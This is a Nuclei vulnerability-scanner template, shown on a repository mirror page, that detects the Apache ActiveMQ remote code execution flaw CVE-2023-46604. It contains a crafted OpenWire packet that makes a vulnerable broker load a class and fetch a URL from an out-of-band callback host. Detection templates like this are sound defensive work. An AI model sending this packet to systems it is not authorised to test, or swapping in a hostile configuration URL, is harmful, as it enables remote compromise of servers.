daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
nuclei-templates/network/cves/2023/CVE-2023-46604.yaml

52 lines
2.2 KiB
YAML
Raw Blame History

id: CVE-2023-46604
info:
name: Apache ActiveMQ - Remote Code Execution
author: Ice3man,Mzack9999,pdresearch
severity: critical
description: |
Apache ActiveMQ is vulnerable to Remote Code Execution.The vulnerability may allow a remote attacker with network access to a broker to run arbitrary shell commands by manipulating serialized class types in the OpenWire protocol to cause the broker to instantiate any class on the classpath.
Users are recommended to upgrade to version 5.15.16, 5.16.7, 5.17.6, or 5.18.3, which fixes this issue.
reference:
- http://www.openwall.com/lists/oss-security/2023/10/27/5
- https://activemq.apache.org/security-advisories.data/CVE-2023-46604-announcement.txt
- https://github.com/X1r0z/ActiveMQ-RCE
- https://attackerkb.com/topics/IHsgZDE3tS/cve-2023-46604/rapid7-analysis?referrer=etrblog
- https://paper.seebug.org/3058/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:H/A:H
cvss-score: 10
cve-id: CVE-2023-46604
cwe-id: CWE-502
epss-score: 0.00053
metadata:
max-request: 1
shodan-query: product:"ActiveMQ OpenWire Transport"
verified: true
tags: cve,cve2023,network,rce,apache,activemq,deserialization
variables:
prefix: "1f00000000000000000001010042"
classname: "6f72672e737072696e676672616d65776f726b2e636f6e746578742e737570706f72742e436c61737350617468586d6c4170706c69636174696f6e436f6e7465787401"
final: "{{prefix}}{{classname}}"
tcp:
- inputs:
- data: "{{hex_decode('00000'+dec_to_hex(len(final+'00'+dec_to_hex(len('http://{{interactsh-url}}'))+hex_encode('http://{{interactsh-url}}')))+final+'00'+dec_to_hex(len('http://{{interactsh-url}}'))+hex_encode('http://{{interactsh-url}}'))}}"
host:
- "{{Hostname}}"
port: 61616
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
- "http"
- type: word
words:
- "ActiveMQ"
- "StackTraceEnabled"
condition: and
# digest: 4b0a00483046022100f363443cf43dcc6cfff466d9b2f2606a19f6366bf864994566b83a1b1a62b524022100886785b126a725f1ea5ff4295d1d61cfc9767f17a1a5de7d28c16744f15d1bfe:922c64590222798bb761d5b6d8e72950
Reference in New Issue View Git Blame Copy Permalink